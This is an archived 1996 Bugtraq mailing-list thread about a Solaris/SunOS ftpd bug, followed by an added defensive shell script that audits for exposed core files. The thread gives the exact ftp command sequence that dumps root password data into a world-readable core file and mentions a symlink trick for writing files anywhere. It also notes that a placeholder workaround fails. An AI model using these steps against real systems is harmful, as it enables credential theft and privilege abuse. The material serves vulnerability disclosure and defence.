Bugtraq mailing list archives

Re: ftpd bug? Was: bin/1805: Bug in ftpd


From: dougw () ncccs cc nc us (Doug Williams)
Date: Wed, 16 Oct 1996 14:22:06 -0400



SunOS 5.5:

logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv

voila, root password in world readable core dump under /tmp

        I was able to create this core file under Solaris 2.4 as well...and
if I took the time to create a symbolic link before doing the above
procedure, I was able to create files anywhere on the system :(


I got the same on Solaris 2.4.  Being swamped right now I thought I might
create an empty "core" in /tmp and set permissions to 000.  When doing the ftp
exploit it fills/replaces the core file, but leaves the permissions
intact. ...Maybe this soft patch will hold for a bit?


*POOOWWWWW*    (delusional patch blow)

Ummmmm... never mind, I'm a dolt.  I was able to surf around until I found
another 777 directory and Voila!
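
The check below is an added example, not part of the original post: a POSIX shell audit for the conditions this thread describes (world-writable directories, world-readable files named core, and symbolic links named core). The function names are hypothetical.

```shell
#!/bin/sh
# Added example (not from the original post): audit for the conditions the
# thread describes. All function names here are hypothetical.

# Directories any local user can write to. Each one is a place where a
# pre-created "core" placeholder in /tmp alone gives no protection.
world_writable_dirs() {
    find "$1" -xdev -type d -perm -0002 -print 2>/dev/null
}

# Regular files named "core" that other users can read.
world_readable_cores() {
    find "$1" -xdev -type f -name core -perm -0004 -print 2>/dev/null
}

# Symbolic links named "core": a dump written through one lands on the
# link target instead of in the directory itself.
core_symlinks() {
    find "$1" -xdev -type l -name core -print 2>/dev/null
}

# Print one tagged line per finding under the given starting directory.
audit_core_exposure() {
    root=${1:-/}
    world_writable_dirs "$root" | sed 's/^/WRITABLE-DIR  /'
    world_readable_cores "$root" | sed 's/^/READABLE-CORE /'
    core_symlinks "$root" | sed 's/^/CORE-SYMLINK  /'
}

# Run the audit only when a starting directory is given on the command line.
if [ "$#" -gt 0 ]; then
    audit_core_exposure "$1"
fi
```

A placeholder core file with mode 000 is not reported by `world_readable_cores`, so the output shows what remains exposed after that workaround.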


